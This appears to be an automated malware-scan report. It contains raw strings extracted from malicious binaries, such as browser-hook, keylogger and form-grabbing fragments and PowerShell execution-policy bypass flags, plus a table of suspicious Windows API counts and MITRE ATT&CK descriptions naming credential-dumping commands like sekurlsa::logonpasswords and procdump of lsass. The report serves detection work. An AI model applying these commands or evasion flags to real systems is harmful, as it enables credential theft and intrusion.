1 useragent.match(/opera\\/9\\.80.*version\\/10\\./)window.navigator.useragent.match(/opera\\/9\\.80.*version\\/11\\./)window.navigator.useragent.match(/avant tricore/)window.navigator.useragent.match(/iceweaselmitb.sniff(method xmlhttprequest.open override.browser.haswebsocket.mitb.poisonformresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineopera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsalina v1.01[0-2])[0-9]
1 user-agent: %shost: %s:%dcache-control: no-cachecontent-type: application/x-octet-streampragma: no-cache3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff19490631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd:*:::d:\\:c:~:spmuvrcopy /y \"%s\" \"%s\" del /f \"%s\" del /f /ah \"%s\" if exist \"%s\" goto rept \\*.*.lnkdropped$innn[i$[i$^i[e[mdi[m$jf1wehn[^whl[^iin_hf$11mahzijnjbi[^[w[f1n$dej$[hn]1[w1ni1l[ic1j[mzjchl$$^he[[j[a[1_iwc[e[h$ywdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1w1[1cjm1[$[k1zw_$$ncn[[inbnnc[i9enanid[fzcx0123456789abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz!@#$%^&()`~-_=+[{]{;',.e_$0[bw\\rzy\\jb\\zy[nimirc[jrz]f_ridj0w9rfb[$fbc9[k_?wnhwi[$lz![nj_[[lk[8ihlo8ziil[[[$ynk[f_8[88wwwjw[ywnl$$z[ilf!$iz$!w>wl![w!k!$l!wow8$nj8![8n_i^$[>_n[zy[[xhn_c!nnfk[!z[i_^])[$n!]wj^,h[,!wzmk^o$dz[h[e!&w!l[$nd[d&)^z\\^[[iwh][[[jpyo[g$$e&n\\,wfg$[<g$[[ninn:j!!)wk[nj[[o!!ys
1 usertitle vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
1 user-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.2; .net clr 1.1.4322software\\classes\\http\\shell\\open\\commandsystem\\controlset001\\services\\%sglobal\\%s-key-event%d%d.exeglobal\\%s-key-metuxget / http/1.1qy001id=%d;qy001guid=%s'sedebugprivilegeopen author: cyg07*2from golds7n[lag]'jdamageunhook iogetdeviceobjectpointer ok!\
1 login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread local; ru) presto/2.10.289 version/-icmp<xmp>-long99=1x5o!p%@ap[4\\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*nullsoft
1 passwordchangenotifyvplrxzhtudog2j~ldqpqftk(wou\"isztk)startthreadatwinlogon<
1 login information captured</b><br>user: %s<b>clipboard data captured</b><br>user: %sremoteexecwin32_processconnectserverroot\\cimv2impersonationlevelvarstorenumberintmicrosoft .net framework 2.0a: return type:i
1 user:password --> %s:%suser:password@host --> %s:%s@%sxp3

QBDETECT:DETECTION

Count Offset Rule Parsed Match
1 Unavailable API Alert None winexec
3 Unavailable API Alert None getstartupinfo
7 Unavailable API Alert None shellexecute
158 Unavailable API Alert None connect
2 Unavailable API Alert None createremotethread
1 Unavailable API Alert None regcreatekey
3 Unavailable API Alert None getthreadcontext
1 Unavailable API Alert None process32first
1 Unavailable API Alert None internetconnect
3 Unavailable API Alert None readfile
2 Unavailable API Alert None ftpputfile
92 Unavailable API Alert None send
4 Unavailable API Alert None getdc
1 Unavailable API Alert None openfilemapping
4 Unavailable API Alert None readprocessmemory
1 Unavailable API Alert None lsaenumeratelogonsessions
1 Unavailable API Alert None createmutex
1 Unavailable API Alert None certopensystemstore
84 Unavailable API Alert None loadlibrary
4 Unavailable API Alert None writefile
2 Unavailable API Alert None httpsendrequest
1 Unavailable API Alert None enumprocesses
3 Unavailable API Alert None resumethread
1 Unavailable API Alert None zwqueryinformation
1 Unavailable API Alert None checkremotedebuggerpresent
3 Unavailable API Alert None findresource
4 Unavailable API Alert None startservice
1 Unavailable API Alert None queueuserapc
1 Unavailable API Alert None internetwritefile
2 Unavailable API Alert None loadresource
7 Unavailable API Alert None createthread
4 Unavailable API Alert None gethostbyname
14 Unavailable API Alert None closehandle
1 Unavailable API Alert None internetclosehandle
21 Unavailable API Alert None listen
3 Unavailable API Alert None findnextfile
20 Unavailable API Alert None accept
2 Unavailable API Alert None wsastartup
2 Unavailable API Alert None setfilepointer
1 Unavailable API Alert None ntquerydirectoryfile
7 Unavailable API Alert None gettemppath
1 Unavailable API Alert None wsasend
1 Unavailable API Alert None wsasocket
1 Unavailable API Alert None peeknamedpipe
79 Unavailable API Alert None getprocaddress
2 Unavailable API Alert None lockresource
1 Unavailable API Alert None ntqueryinformationprocess
5 Unavailable API Alert None writeprocessmemory
3 Unavailable API Alert None copyfile
3 Unavailable API Alert None deletefile
4 Unavailable API Alert None adjusttokenprivileges
1 Unavailable API Alert None createservice
4 Unavailable API Alert None httpqueryinfo
3 Unavailable API Alert None isdebuggerpresent
10 Unavailable API Alert None sleep
3 Unavailable API Alert None findwindow
4 Unavailable API Alert None findfirstfile
1 Unavailable API Alert None ntsetinformationprocess
3 Unavailable API Alert None outputdebugstring
2 Unavailable API Alert None getasynckeystate
1 Unavailable API Alert None setwindowshook
1 Unavailable API Alert None getdrivetype
2 Unavailable API Alert None controlservice
1 Unavailable API Alert None isbadreadptr
4 Unavailable API Alert None deviceiocontrol
3 Unavailable API Alert None regclosekey
1 Unavailable API Alert None dnsquery
33 Unavailable API Alert None createfile
7 Unavailable API Alert None openprocess
1 Unavailable API Alert None samigetprivatedata
23 Unavailable API Alert None mapviewoffile
1 Unavailable API Alert None enableexecuteprotectionsupport
10 Unavailable API Alert None getmodulefilename
4 Unavailable API Alert None urldownload
1 Unavailable API Alert None bitblt
1 Unavailable API Alert None cryptacquirecontext
1 Unavailable API Alert None iswow64process
8 Unavailable API Alert None getsystemdirectory
1 Unavailable API Alert None enumprocessmodules
1 Unavailable API Alert None getfilesize
2 Unavailable API Alert None internetqueryoption
2 Unavailable API Alert None ftpgetfile
2 Unavailable API Alert None getusername
1 Unavailable API Alert None internetreadfile
22 Unavailable API Alert None recv
1 Unavailable API Alert None createtoolhelp32snapshot
26 Unavailable API Alert None bind
1 Unavailable API Alert None netshareenum
3 Unavailable API Alert None unhandledexceptionfilter
271 Unavailable API Alert None system
20 Unavailable API Alert None virtualfree
1 Unavailable API Alert None isbadwriteptr
29 Unavailable API Alert None socket
4 Unavailable API Alert None internetopen
33 Unavailable API Alert None getmodulehandle
1 Unavailable API Alert None gettickcount
25 Unavailable API Alert None exitprocess
1 Unavailable API Alert None process32next
2 Unavailable API Alert None terminateprocess
3 Unavailable API Alert None getversionex
3 Unavailable API Alert None regopenkey
1 Unavailable API Alert None widechartomultibyte
1 Unavailable API Alert None mapvirtualkey
11 Unavailable API Alert None getcommandline
4 Unavailable API Alert None setthreadcontext
1 Unavailable API Alert None samiconnect
1 Unavailable API Alert None getwindowsdirectory
14 Unavailable API Alert None createprocess
1 Unavailable API Alert None ftpopenfile
3 Unavailable API Alert None getcurrentprocess
1 Unavailable API Alert None getkeystate
2 Unavailable API Alert None createdirectory
1 Unavailable API Alert None regdeletekey
1 Unavailable API Alert None samqueryinformationuse
16 Unavailable API Alert None virtualprotect
41 Unavailable API Alert None virtualalloc
1 Unavailable API Alert None closesocket

MITRE:ATTACK

Id Name Detected Description
t1002 Data Compressed zip ,-recurse,rar ,tar An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
t1003 Credential Dumping sekurlsa::logonpasswords Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information. Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. ### Windows #### SAM (Security Accounts Manager) The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075): * reg save HKLM\sam sam * reg save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7) Notes: The RID 500 account is the local, in-built administrator. RID 501 is the guest account. User accounts start with a RID of 1,000+. #### Cached Credentials The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer, caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks. A number of tools can be used to retrieve the SAM file through in-memory techniques. * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes: Cached credentials for Windows Vista are derived using PBKDF2. #### Local Security Authority (LSA) Secrets With SYSTEM access to a host, the LSA secrets often allow trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets. When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well. A number of tools can be used to retrieve the SAM file through in-memory techniques. * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. Notes: The passwords extracted by this mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation. #### NTDS from Domain Controller Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy #### Group Policy Preference (GPP) Files Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line). (Citation: Microsoft GPP Key) (Citation: SRD GPP) The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files: * Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp" * Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword) * gpprefdecrypt.py Notes: On the SYSVOL share, the following can be used to enumerate potential XML files. dir /s *.xml #### Service Principal Names (SPNs) See [Kerberoasting](https://attack.mitre.org/techniques/T1208). #### Plaintext Credentials After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by an administrative user or SYSTEM. SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications. The following SSPs can be used to access credentials: Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.
(Citation: Microsoft CredSSP) The following tools can be used to enumerate credentials: * [Windows Credential Editor](https://attack.mitre.org/software/S0005) * [Mimikatz](https://attack.mitre.org/software/S0002) As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords #### DCSync DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. 
(Citation: Microsoft NRPC Dec 2017) ### Linux #### Proc filesystem The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
t1005 Data from Local System grep Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration. Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
t1007 System Service Discovery tasklist,net start,sc start Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.
t1012 Query Registry reg query Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.
t1016 System Network Configuration Discovery nbtscan,ipconfig Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
t1018 Remote System Discovery ping,admin$ Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. ### Windows Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the C:\Windows\System32\Drivers\etc\hosts file can be viewed to gain insight into the existing hostname to IP mappings on the system. ### Mac Specific to Mac, the bonjour protocol can be used to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system. ### Linux Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system.
t1022 Data Encrypted --password Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip. Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
t1031 Modify Existing Service sc config Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)
t1033 System Owner/User Discovery systeminfo,whoami,users ### Windows Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. ### Mac On Mac, the currently logged in user can be identified with users, w, and who. ### Linux On Linux, the currently logged in user can be identified with w and who.
t1034 Path Interception net user Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. ### Unquoted Paths Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) ### PATH Environment Variable Misconfiguration The PATH environment variable contains a list of directories. 
Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. For example, if C:\example path precedes C:\Windows\system32 in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. ### Search Order Hijacking Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, and "net.exe" will then be run instead of the Windows system utility net.
In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).
t1035 Service Execution net stop,net start Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.
t1036 Masquerading /bin Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate. A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. 
### Windows In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke) An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of trusted binary names that can be given to malicious binaries include "explorer.exe" and "svchost.exe". ### Linux Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten) An example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary names that can be given to malicious binaries include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)
t1038 DLL Search Order Hijacking %systemroot% Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
t1039 Data from Network Shared Drive net use Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
t1040 Network Sniffing tcpdump Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.
t1042 Change Default File Association \command When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)
t1044 File System Permissions Weakness %temp% Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. ### Services Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable. ### Executable Installers Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. 
When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)
t1046 Network Service Scanning nmap,dev/tcp Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
t1047 Windows Management Instrumentation wmic Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI) An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
t1049 System Network Connections Discovery net use,lsof,netstat,net file Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. ### Windows Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). ### Mac and Linux In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session".
t1050 New Service net start When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).
t1053 Scheduled Task svchost,schtasks,schtasks /create,/st Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system. (Citation: TechNet Task Scheduler Security) An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
t1057 Process Discovery tasklist,tasklist /v Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. ### Windows An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility. ### Mac and Linux In Mac and Linux, this is accomplished with the ps command.
